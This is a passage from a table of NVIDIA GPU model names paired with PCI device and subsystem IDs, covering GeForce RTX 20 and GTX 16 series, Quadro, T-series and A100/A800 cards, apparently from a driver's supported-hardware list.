RTX 2080 Super with Max-Q Design | 1E93 1458 76B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 76B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 78A0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 78A1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 86B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 86B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12AE | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12B4 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12C6 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1558 50D3 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1558 70D1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 17AA 22C3 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 17AA 22C5 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 2009 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 200A | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 3002 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1D05 1089 | | Quadro RTX 5000 | 1EB0 | | Quadro RTX 4000 | 1EB1 | | Quadro RTX 5000 | 1EB5 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 1375 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 1401 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 149C | | Quadro RTX 5000 with Max-Q Design | 1EB5 1028 09C3 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8736 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8738 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8772 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8780 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8782 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8783 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8785 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1043 1DD1 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 1274 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 12B0 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 12C6 | | Quadro RTX 5000 with Max-Q Design | 1EB5 17AA 22B8 | | Quadro RTX 5000 with Max-Q Design | 1EB5 17AA 22BA | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2005 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2007 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2008 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 200A | | Quadro RTX 4000 | 1EB6 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1028 09C3 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8736 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8738 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8772 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8780 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8782 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8783 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8785 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 1274 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 1277 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 12B0 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 12C6 | | Quadro RTX 4000 with Max-Q Design | 1EB6 17AA 22B8 | | Quadro RTX 4000 with Max-Q Design | 1EB6 17AA 22BA | | NVIDIA GeForce RTX 2070 SUPER | 1EC2 | | NVIDIA GeForce RTX 2070 SUPER | 1EC7 | | NVIDIA GeForce RTX 2080 | 1ED0 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1025 132D | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08ED | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08EE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08EF | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8572 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8573 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8600 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8605 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1043 138F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1043 15C1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 17AA 3FEE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 17AA 3FFE | | NVIDIA GeForce RTX 2070 Super | 1ED1 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 1025 1432 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 103C 8746 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 103C 878A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 1043 165F | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 144D C192 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FCE | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FCF | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FD0 | | NVIDIA GeForce RTX 2080 Super | 1ED3 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1025 1432 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1028 09D1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 103C 8746 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 103C 878A | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1D61 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1E51 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1F01 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FCE | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FCF | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FD0 | | Quadro RTX 5000 | 1EF5 | | NVIDIA GeForce RTX 2070 | 1F02 | | NVIDIA GeForce RTX 2060 | 1F03 | | NVIDIA GeForce RTX 2060 SUPER | 1F06 | | NVIDIA GeForce RTX 2070 | 1F07 | | NVIDIA GeForce RTX 2060 | 1F08 | | NVIDIA GeForce GTX 1650 | 1F0A | | NVIDIA GeForce RTX 2070 | 1F10 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1025 132D | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1025 1342 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08A1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08A2 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EA | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EB | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EC | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08ED | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 093B | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 093C | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8572 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8573 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8602 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8606 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 132F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 136F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 1881 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 1E6E | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1658 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1663 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1664 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 75A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 75A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 86A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 86A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1462 1274 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1462 1277 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1558 95E1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1558 97E1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2002 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2005 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2007 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 3000 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 3001 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 105E | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 1070 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 2087 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 8086 2087 | | NVIDIA GeForce RTX 2060 | 1F11 | | NVIDIA GeForce RTX 2060 | 1F12 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1028 098F | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 8741 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 8744 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 878E | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 880E | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1043 1E11 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1043 1F11 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1462 12D9 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3801 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3802 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3803 | | NVIDIA GeForce RTX 2070 | 1F14 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1401 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1432 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1442 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1446 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 147D | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1028 09E2 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1028 09F3 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8607 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 86C6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 86C7 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8736 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8738 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8746 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8772 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 878A | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 878B | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 87A6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 87A7 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1043 174F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 1512 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 75B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 75B6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 76B4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 76B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 78A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 78A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 86B4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 86B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12AE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12B0 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12C6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1558 50D3 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1558 70D1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 200C | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 2011 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 3002 | | NVIDIA GeForce RTX 2060 | 1F15 | | Quadro RTX 3000 | 1F36 | | Quadro RTX 3000 with Max-Q Design | 1F36 1028 0990 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8736 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8738 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8772 | | Quadro RTX 3000 with Max-Q Design | 1F36 1043 13CF | | Quadro RTX 3000 with Max-Q Design | 1F36 1414 0032 | | NVIDIA GeForce RTX 2060 SUPER | 1F42 | | NVIDIA GeForce RTX 2060 SUPER | 1F47 | | NVIDIA GeForce RTX 2070 | 1F50 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 1028 08ED | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 1028 08EE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 1028 08EF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8572 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8573 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8574 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8600 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8605 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 17AA 3FEE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 17AA 3FFE | | NVIDIA GeForce RTX 2060 | 1F51 | | NVIDIA GeForce RTX 2070 | 1F54 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 103C 878A | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FCE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FCF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FD0 | | NVIDIA GeForce RTX 2060 | 1F55 | | Quadro RTX 3000 | 1F76 | | Matrox D-Series D2450 | 1F76 102B 2800 | | Matrox D-Series D2480 | 1F76 102B 2900 | | NVIDIA GeForce GTX 1650 | 1F82 | | NVIDIA GeForce GTX 1630 | 1F83 | | NVIDIA GeForce GTX 1650 | 1F91 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 863E | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 86E7 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 86E8 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1043 12CF | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1043 156F | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1414 0032 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 144D C822 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 127E | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1281 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1284 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1285 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 129C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 229F | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3802 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3806 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3F1A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1A58 1001 | | NVIDIA GeForce GTX 1650 Ti | 1F95 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 1479 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147A | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147B | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147C | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 86E7 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 86E8 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 8815 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1043 1DFF | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1043 1E1F | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 144D C838 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12BD | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12C5 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12D2 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 22C0 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 22C1 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 3837 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 3F95 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1A58 1003 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1A58 1006 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1A58 1007 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1E83 3E30 | | NVIDIA GeForce GTX 1650 | 1F96 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F96 1462 1297 | | NVIDIA GeForce MX450 | 1F97 | | NVIDIA GeForce MX450 | 1F98 | | NVIDIA GeForce GTX 1650 | 1F99 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 1479 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147B | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 103C 8815 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 13B2 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 1402 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 1902 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12BD | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12C5 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12D2 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 17AA 22DA | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 17AA 3F93 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1E83 3E30 | | NVIDIA GeForce MX450 | 1F9C | | NVIDIA GeForce GTX 1650 | 1F9D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 128D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 130D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 149C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 185C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 189C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 12F4 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 1302 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 131B | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 1326 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 132A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 132E | | NVIDIA GeForce MX550 | 1F9F | | NVIDIA GeForce MX550 | 1FA0 | | NVIDIA T1000 | 1FB0 1028 12DB | | NVIDIA T1000 | 1FB0 103C 12DB | | NVIDIA T1000 | 1FB0 103C 8A80 | | NVIDIA T1000 | 1FB0 10DE 12DB | | NVIDIA DGX Display | 1FB0 10DE 1485 | | NVIDIA T1000 | 1FB0 17AA 12DB | | NVIDIA T600 | 1FB1 1028 1488 | | NVIDIA T600 | 1FB1 103C 1488 | | NVIDIA T600 | 1FB1 103C 8A80 | | NVIDIA T600 | 1FB1 10DE 1488 | | NVIDIA T600 | 1FB1 17AA 1488 | | NVIDIA T400 | 1FB2 1028 1489 | | NVIDIA T400 | 1FB2 103C 1489 | | NVIDIA T400 | 1FB2 103C 8A80 | | NVIDIA T400 | 1FB2 10DE 1489 | | NVIDIA T400 | 1FB2 17AA 1489 | | NVIDIA T600 Laptop GPU | 1FB6 | | NVIDIA T550 Laptop GPU | 1FB7 | | Quadro T2000 | 1FB8 | | Quadro T2000 with Max-Q Design | 1FB8 1028 097E | | Quadro T2000 with Max-Q Design | 1FB8 103C 8736 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8738 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8772 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8780 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8782 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8783 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8785 | | Quadro T2000 with Max-Q Design | 1FB8 103C 87F0 | | Quadro T2000 with Max-Q Design | 1FB8 1462 1281 | | Quadro T2000 with Max-Q Design | 1FB8 1462 12BD | | Quadro T2000 with Max-Q Design | 1FB8 17AA 22C0 | | Quadro T2000 with Max-Q Design | 1FB8 17AA 22C1 | | Quadro T1000 | 1FB9 | | Quadro T1000 with Max-Q Design | 1FB9 1025 1479 | | Quadro T1000 with Max-Q Design | 1FB9 1025 147A | | Quadro T1000 with Max-Q Design | 1FB9 1025 147B | | Quadro T1000 with Max-Q Design | 1FB9 1025 147C | | Quadro T1000 with Max-Q Design | 1FB9 103C 8736 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8738 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8772 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8780 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8782 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8783 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8785 | | Quadro T1000 with Max-Q Design | 1FB9 103C 87F0 | | Quadro T1000 with Max-Q Design | 1FB9 1462 12BD | | Quadro T1000 with Max-Q Design | 1FB9 17AA 22C0 | | Quadro T1000 with Max-Q Design | 1FB9 17AA 22C1 | | NVIDIA T600 Laptop GPU | 1FBA | | NVIDIA T500 | 1FBB | | NVIDIA T1200 Laptop GPU | 1FBC | | NVIDIA GeForce GTX 1650 | 1FDD | | NVIDIA T1000 8GB | 1FF0 1028 1612 | | NVIDIA T1000 8GB | 1FF0 103C 1612 | | NVIDIA T1000 8GB | 1FF0 103C 8A80 | | NVIDIA T1000 8GB | 1FF0 10DE 1612 | | NVIDIA T1000 8GB | 1FF0 17AA 1612 | | NVIDIA T400 4GB | 1FF2 1028 1613 | | NVIDIA T400 4GB | 1FF2 103C 1613 | | NVIDIA T400E | 1FF2 103C 18FF | | NVIDIA T400 4GB | 1FF2 103C 8A80 | | NVIDIA T400 4GB | 1FF2 10DE 1613 | | NVIDIA T400E | 1FF2 10DE 18FF | | NVIDIA T400 4GB | 1FF2 17AA 1613 | | NVIDIA T400E | 1FF2 17AA 18FF | | Quadro T1000 | 1FF9 | | NVIDIA A100-SXM4-40GB | 20B0 | | NVIDIA A100-PG509-200 | 20B0 10DE 1450 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1463 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 147F | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1622 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1623 | | NVIDIA PG509-210 | 20B2 10DE 1625 | | NVIDIA A100-SXM-64GB | 20B3 10DE 14A7 | | NVIDIA A100-SXM-64GB | 20B3 10DE 14A8 | | NVIDIA A100 80GB PCIe | 20B5 10DE 1533 | | NVIDIA A100 80GB PCIe | 20B5 10DE 1642 | | NVIDIA PG506-232 | 20B6 10DE 1492 | | NVIDIA A30 | 20B7 10DE 1532 | | NVIDIA A30 | 20B7 10DE 1804 | | NVIDIA A30 | 20B7 10DE 1852 | | NVIDIA A800-SXM4-40GB | 20BD 10DE 17F4 | | NVIDIA A100-PCIE-40GB | 20F1 10DE 145F | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179B | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179C | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179D | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179E | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179F | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A0 | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A1 | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A2 | | NVIDIA A800 80GB PCIe | 20F5 10DE 1799 | | NVIDIA A800 80GB PCIe LC | 20F5 10DE 179A | | NVIDIA A800 40GB Active | 20F6 1028 180A | | NVIDIA A800 40GB Active | 20F6 103C 180A | | NVIDIA A800 40GB Active | 20F6 10DE 180A | | NVIDIA A800 40GB Active | 20F6 17AA 180A | | NVIDIA AX800 | 20FD 10DE 17F8 | | NVIDIA GeForce GTX 1660 Ti | 2182 | | NVIDIA GeForce GTX 1660 | 2184 | | NVIDIA GeForce GTX 1650 SUPER | 2187 | | NVIDIA GeForce GTX 1650 | 2188 | | NVIDIA GeForce GTX 1660 Ti | 2191 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1028 0949 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 85FB | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 85FE | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 86D6 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 8741 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 8744 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 878D | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 87AF | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 87B3 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 171F | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 17EF | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 18D1 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1414 0032 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 128A | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 128B | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12C6 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12CB | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12CC | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12D9 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 380C | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 381D | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 381E | | NVIDIA GeForce GTX 1650 Ti | 2192 | | NVIDIA GeForce GTX 1660 SUPER | 21C4 | | NVIDIA GeForce GTX 1660 Ti | 21D1 | | NVIDIA GeForce RTX 3090 Ti | 2203 | | NVIDIA GeForce RTX 3090 | 2204 | | NVIDIA GeForce RTX 3080 | 2206 | | NVIDIA GeForce 